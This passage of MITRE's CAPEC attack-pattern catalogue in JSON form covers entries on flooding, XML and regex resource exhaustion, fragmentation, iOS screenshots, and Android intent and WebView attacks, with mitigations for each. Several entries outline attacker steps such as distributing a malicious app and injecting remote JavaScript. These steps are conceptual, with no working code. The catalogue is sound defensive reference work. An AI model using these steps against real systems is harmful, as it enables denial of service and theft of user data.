Flood"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"487":{"ID":"487","Name":"ICMP Flood","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute a flooding attack using the ICMP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. A typical attack involves a victim server receiving ICMP packets at a high rate from a wide range of source addresses. Additionally, due to the session-less nature of the ICMP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the ability to generate a large amount of ICMP traffic to send to the target server."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, an organization can enable ingress filtering. Additionally modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.001","Entry_Name":"Network Denial of Service:Direct Network Flood"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"488":{"ID":"488","Name":"HTTP Flood","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute a flooding attack using the HTTP protocol with the intent to deny legitimate users access to a service by consuming resources at the application layer such as web services and their infrastructure. These attacks use legitimate session-based HTTP GET requests designed to consume large amounts of a server\'s resources. Since these are legitimate sessions this attack is very difficult to detect.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the ability to generate a large amount of HTTP traffic to send to a target server."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, an organization can monitor the typical traffic flow. When spikes in usage occur, filters could examine traffic for indicators of bad behavior with respect to the web servers, and then create firewall rules to deny the malicious IP addresses. These patterns in the filter could be a combination of trained behavior, knowledge of standards as they apply to the web server, known patterns, or anomaly detection. Firewalling source IPs works since the HTTP is sent using TCP so the source IP can\'t be spoofed; if the source IP is spoofed is, then it\'s not legitimate traffic. Special care should be taken care with rule sets to ensure low false positive rates along with a method at the application layer to allow a valid user to begin using the service again. Another possible solution is using 3rd party providers as they have experts, knowledge, experience, and resources to deal with the attack and mitigate it before hand or while it occurs. The best mitigation is preparation before an attack, but there is no bulletproof solution as with ample resources a brute force attack may succeed."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1499.002","Entry_Name":"Endpoint Denial of Service:Service Exhaustion Flood"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.001","Entry_Name":"Network Denial of Service:Direct Network Flood"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"489":{"ID":"489","Name":"SSL Flood","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute a flooding attack using the SSL protocol with the intent to deny legitimate users access to a service by consuming all the available resources on the server side. These attacks take advantage of the asymmetric relationship between the processing power used by the client and the processing power used by the server to create a secure connection. In this manner the attacker can make a large number of HTTPS requests on a low provisioned machine to tie up a disproportionately large number of resources on the server. The clients then continue to keep renegotiating the SSL connection. When multiplied by a large number of attacking machines, this attack can result in a crash or loss of service to legitimate users.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the ability to generate a large amount of SSL traffic to send a target server."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, an organization can create rule based filters to silently drop connections if too many are attempted in a certain time period."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1499.002","Entry_Name":"Endpoint Denial of Service:Service Exhaustion Flood"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.001","Entry_Name":"Network Denial of Service:Direct Network Flood"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"490":{"ID":"490","Name":"Amplification","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute an amplification where the size of a response is far greater than that of the request that generates it. The goal of this attack is to use a relatively few resources to create a large amount of traffic against a target server. To execute this attack, an adversary send a request to a 3rd party service, spoofing the source address to be that of the target server. The larger response that is generated by the 3rd party service is then sent to the target server. By sending a large number of initial requests, the adversary can generate a tremendous amount of traffic directed at the target. The greater the discrepancy in size between the initial request and the final payload delivered to the target increased the effectiveness of this attack.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"This type of an attack requires the existence of a 3rd party service that generates a response that is significantly larger than the request that triggers it."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, an organization can attempt to identify the 3rd party services being used in an active attack and blocking them until the attack ends. This can be accomplished by filtering traffic for suspicious message patterns such as a spike in traffic where each response contains the same large block of data. Care should be taken to prevent false positive rates so legitimate traffic isn\'t blocked."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.002","Entry_Name":"Network Denial of Service:Reflection Amplification"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"491":{"ID":"491","Name":"Quadratic Data Expansion","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits macro-like substitution to cause a denial of service situation due to excessive memory being allocated to fully expand the data. The result of this denial of service could cause the application to freeze or crash. This involves defining a very large entity and using it multiple times in a single entity substitution. CAPEC-197 is a similar attack pattern, but it is easier to discover and defend against. This attack pattern does not perform multi-level substitution and therefore does not obviously appear to consume extensive resources.","Alternate_Terms":{"Alternate_Term":{"Term":"XML Entity Expansion (XEE)"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"230"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] An adversary determines the input data stream that is being processed by a data parser that supports using substituion on the victim\'s side.","Technique":["Use an automated tool to record all instances of URLs to process requests.","Use a browser to manually explore the website and analyze how the application processes requests."]},{"Step":"2","Phase":"Exploit","Description":"[Craft malicious payload] The adversary crafts malicious message containing nested quadratic expansion that completely uses up available server resource."},{"Step":"3","Phase":"Exploit","Description":"[Send the message] Send the malicious crafted message to the target URL."}]},"Prerequisites":{"Prerequisite":"This type of attack requires a server that accepts serialization data which supports substitution and parses the data."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"],"Note":"Denial of Service"}},"Mitigations":{"Mitigation":["Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.","Implementation: For XML based data - disable altogether the use of inline DTD schemas when parsing XML objects. If a DTD must be used, normalize, filter and use an allowlist and parse with methods and routines that will detect entity expansion from untrusted sources."]},"Example_Instances":{"Example":{"p":["In this example the attacker defines one large entity and refers to it many times.","This results in a relatively small message of 100KBs that will expand to a message in the GB range."],"div":["<?xml version=\\"1.0\\"?>",{"style":"margin-left:10px;","class":"informative","em":["... [100K of them] ...","... [100K of them]..."]}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Name, Alternate_Terms, Consequences, Description, Example_Instances, Execution_Flow, Mitigations, Prerequisites"}],"Previous_Entry_Name":["XML Quadratic Expansion",{"Date":"2021-10-21"}]}},"492":{"ID":"492","Name":"Regular Expression Exponential Blowup","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions. The algorithm builds a finite state machine and based on the input transitions through all the states until the end of the input is reached. NFA engines may evaluate each character in the input string multiple times during the backtracking. The algorithm tries each path through the NFA one by one until a match is found; the malicious input is crafted so every path is tried which results in a failure. Exploitation of the Regex results in programs hanging or taking a very long time to complete. These attacks may target various layers of the Internet due to regular expressions being used in validation.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"130","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"This type of an attack requires the ability to identify hosts running a poorly implemented Regex, and the ability to send crafted input to exploit the regular expression."},"Mitigations":{"Mitigation":"Test custom written Regex with fuzzing to determine if the Regex is a poor one. Add timeouts to processes that handle the Regex logic. If an evil Regex is found rewrite it as a good Regex."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"400"},{"CWE_ID":"1333"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Regular expression Denial of Service - ReDoS"}},"References":{"Reference":{"External_Reference_ID":"REF-421"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"493":{"ID":"493","Name":"SOAP Array Blowup","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute an attack on a web service that uses SOAP messages in communication. By sending a very large SOAP array declaration to the web service, the attacker forces the web service to allocate space for the array elements before they are parsed by the XML parser. The attacker message is typically small in size containing a large array declaration of say 1,000,000 elements and a couple of array elements. This attack targets exhaustion of the memory resources of the web service.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"130","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"This type of an attack requires the attacker to know the endpoint of the web service, and be able to reach the endpoint with a malicious SOAP message."},"Mitigations":{"Mitigation":"Enforce strict schema validation. The schema should enforce a maximum number of array elements. If the number of maximum array elements can\'t be limited another validation method should be used. One such method could be comparing the declared number of items in the array with the existing number of elements of the array. If these numbers don\'t match drop the SOAP packet at the web service layer."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"References":{"Reference":{"External_Reference_ID":"REF-422"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"494":{"ID":"494","Name":"TCP Fragmentation","Abstraction":"Standard","Status":"Draft","Description":"An attacker may execute a TCP Fragmentation attack against a target with the intention of avoiding filtering rules. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. The attacker attempts to fragment the TCP packet such that the headers flag field is pushed into the second fragment which typically is not filtered. This behavior defeats some IPS and firewall filters who typically check the FLAGS in the header of the first packet since dropping this packet prevents the following fragments from being processed and assembled. Another variation is overlapping fragments thus that an innocuous first segment passes the filter and the second segment overwrites the TCP header data with the true payload which is malicious in nature. The malicious payload manipulated properly may lead to a DoS due to resource consumption or kernel crash. Additionally the fragmentation could be used in conjunction with sending fragments at a rate slightly slower than the timeout to cause a DoS condition by forcing resources that assemble the packet to wait an inordinate amount of time to complete the task. The fragmentation identification numbers could also be duplicated very easily as there are only 16 bits in IPv4 so only 65536 packets are needed.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"130"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send TCP packets of arbitrary size with crafted data."},"Mitigations":{"Mitigation":"This attack may be mitigated by enforcing rules at the router following the guidance of RFC1858. The essential part of the guidance is creating the following rule \\"IF FO=1 and PROTOCOL=TCP then DROP PACKET\\" as this mitigated both tiny fragment and overlapping fragment attacks in IPv4. In IPv6 overlapping(RFC5722) additional steps may be required such as deep packet inspection. The delayed fragments may be mitigated by enforcing a timeout on the transmission to receive all packets by a certain time since the first packet is received. According to RFC2460 IPv6 implementations should enforce a rule to discard all fragments if the fragments are not ALL received within 60 seconds of the FIRST arriving fragment."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"770"},{"CWE_ID":"404"}]},"References":{"Reference":{"External_Reference_ID":"REF-423"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"495":{"ID":"495","Name":"UDP Fragmentation","Abstraction":"Standard","Status":"Draft","Description":"An attacker may execute a UDP Fragmentation attack against a target server in an attempt to consume resources such as bandwidth and CPU. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. Typically the attacker will use large UDP packets over 1500 bytes of data which forces fragmentation as ethernet MTU is 1500 bytes. This attack is a variation on a typical UDP flood but it enables more network bandwidth to be consumed with fewer packets. Additionally it has the potential to consume server CPU resources and fill memory buffers associated with the processing and reassembling of fragmented packets.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"130"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the attacker to be able to generate fragmented IP traffic containing crafted data."},"Mitigations":{"Mitigation":"This attack may be mitigated by changing default cache sizes to be larger at the OS level. Additionally rules can be enforced to prune the cache with shorter timeouts for packet reassembly as the cache nears capacity."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"770"},{"CWE_ID":"404"}]},"References":{"Reference":{"External_Reference_ID":"REF-424"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"496":{"ID":"496","Name":"ICMP Fragmentation","Abstraction":"Standard","Status":"Draft","Description":"An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"130"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send arbitrary sized ICMP packets to the target."},"Mitigations":{"Mitigation":"This attack may be mitigated through egress filtering based on ICMP payload so a network is a \\"good neighbor\\" to other networks. Bad IP implementations become patched, so using the proper version of a browser or OS is recommended."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"770"},{"CWE_ID":"404"}]},"References":{"Reference":{"External_Reference_ID":"REF-425"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"497":{"ID":"497","Name":"File Discovery","Abstraction":"Standard","Status":"Draft","Description":"An adversary engages in probing and exploration activities to determine if common key files exists. Such files often contain configuration and security parameters of the targeted application, system or network. Using this knowledge may often pave the way for more damaging attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"Very Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The adversary must know the location of these common key files."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":"Leverage file protection mechanisms to render these files accessible only to authorized parties."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1083","Entry_Name":"File and Directory Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2019-09-30"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Resources_Required"}]}},"498":{"ID":"498","Name":"Probe iOS Screenshots","Abstraction":"Detailed","Status":"Draft","Description":"An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. These images are used by iOS to aid in the visual transition between open applications and improve the user\'s experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"545","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device)."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, an application that may display sensitive information should clear the screen contents before a screenshot is taken. This can be accomplished by setting the key window\'s hidden property to YES. This code to hide the contents should be placed in both the applicationWillResignActive() and applicationDidEnterBackground() methods."},"References":{"Reference":{"External_Reference_ID":"REF-426","Section":"Chapter 11 : Page 285 : Application Screenshots"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Architectural_Paradigms, Related_Attack_Patterns, Technical_Context"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Probe Application Screenshots",{"Date":"2015-11-09"}]}},"499":{"ID":"499","Name":"Android Intent Intercept","Abstraction":"Standard","Status":"Draft","Description":"An adversary, through a previously installed malicious application, intercepts messages from a trusted Android-based application in an attempt to achieve a variety of different objectives including denial of service, information disclosure, and data injection. An implicit intent sent from a trusted application can be received by any application that has declared an appropriate intent filter. If the intent is not protected by a permission that the malicious application lacks, then the attacker can gain access to the data contained within the intent. Further, the intent can be either blocked from reaching the intended destination, or modified and potentially forwarded along.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"117","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"514"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find an android application that uses implicit intents] Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents. They must also determine what the contents of the intents being sent are such that a malicious application can get sent these intents."},{"Step":"2","Phase":"Experiment","Description":"[Create a malicious app] The adversary must create a malicious android app meant to intercept implicit intents from a target application","Technique":"Specify the type of intent wished to be intercepted in the malicious app\'s manifest file using an intent filter"},{"Step":"3","Phase":"Experiment","Description":"[Get user to download malicious app] The adversary must get a user using the targeted app to download the malicious app by any means necessary"},{"Step":"4","Phase":"Exploit","Description":"[Intercept Implicit Intents] Once the malicious app is downloaded, the android device will forward any implicit intents from the target application to the malicious application, allowing the adversary to gaina access to the contents of the intent. The adversary can proceed with any attack using the contents of the intent.","Technique":["Block the intent from reaching the desired location, causing a denial of service","Gather sensitive information from the intercepted intent","Modify the contents of the intent and forward along to another application"]}]},"Prerequisites":{"Prerequisite":"An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application is used to intercept implicit intents."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Resource Consumption"}]},"Mitigations":{"Mitigation":"To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. Implicit intents should never be used for inter-application communication."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"925"}},"References":{"Reference":{"External_Reference_ID":"REF-427","Section":"3.1 Unauthorized Intent Receipt"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Intent Intercept",{"Date":"2020-12-17"}]}},"500":{"ID":"500","Name":"WebView Injection","Abstraction":"Detailed","Status":"Draft","Description":"An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"253"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target web application] An adversary first needs to determine what web application they wish to target.","Technique":["Target web applications that require users to enter sensitive information.","Target web applications that an adversary wishes to operate on behalf of a logged in user."]},{"Step":"2","Phase":"Experiment","Description":"[Create malicious application] An adversary creates an application, often mobile, that incorporates a WebView component to display the targeted web application. This malicious application needs to downloaded by a user, so adversaries will make this application useful in some way.","Technique":["Create a 3rd party application that adds useful functionality to the targeted web application. Victims will download the application as a means of using the targeted web application.","Create a fun game that at some point directs a user to the targeted web application. For example, prompt the user to buy in game currency by directing them to PayPal."]},{"Step":"3","Phase":"Experiment","Description":"[Get the victim to download and run the application] An adversary needs to get the victim to willingly download and run the application.","Technique":["Pay for App Store advertisements","Promote the application on social media, either through accounts made by the adversary or by paying for other accounts to advertise."]},{"Step":"4","Phase":"Exploit","Description":"[Inject malicious code] Once the victim runs the malicious application and views the targeted web page in the WebView component, the malicious application will inject malicious JavaScript code into the web application. This is done by using WebView\'s loadURL() API, which can inject arbitrary JavaScript code into pages loaded by the WebView component with the same privileges. This is often done by adding a script tag to the document body with a src destination to a remote location that serves malicious JavaScript code.","Technique":["Execute operations on the targeted web page on behalf of an authenticated user.","Steal cookie information from the victim.","Add in extra fields to the DOM in an attempt to get a user to divulge sensitive information."]}]},"Prerequisites":{"Prerequisite":"An adversary must be able install a purpose built malicious application onto the device and convince the user to execute it. The malicious application is designed to target a specific web application and is used to load the target web pages via the WebView component. For example, an adversary may develop an application that interacts with Facebook via WebView and adds a new feature that a user desires. The user would install this 3rd party app instead of the Facebook app."},"Mitigations":{"Mitigation":"The only known mitigation to this type of attack is to keep the malicious application off the system. There is nothing that can be done to the target application to protect itself from a malicious application that has been installed and executed."},"References":{"Reference":{"External_Reference_ID":"REF-430"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}}},"501":{"ID":"501","Name":"Android Activity Hijack","Abstraction":"Detailed","Status":"Draft","Description":"An adversary intercepts an implicit intent sent to launch a Android-based trusted activity and instead launches a counterfeit activity in its place. The malicious activity is then used to mimic the trusted activity\'s user interface and prompt the target to enter sensitive data as if they were interacting with the trusted activity.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"499"},{"Nature":"ChildOf","CAPEC_ID":"173","Exclude_Related":{"Exclude_ID":"403"}}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find an android application that uses implicit intents] Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents to launch an Android-based trusted activity, and what that activity is."},{"Step":"2","Phase":"Experiment","Description":"[Create a malicious app] The adversary must create a malicious android app meant to intercept implicit intents to launch an Adroid-based trusted activity. This malicious app will mimic the trusted activiy\'s user interface to get the user to enter sensitive data.","Technique":"Specify the type of intent wished to be intercepted in the malicious app\'s manifest file using an intent 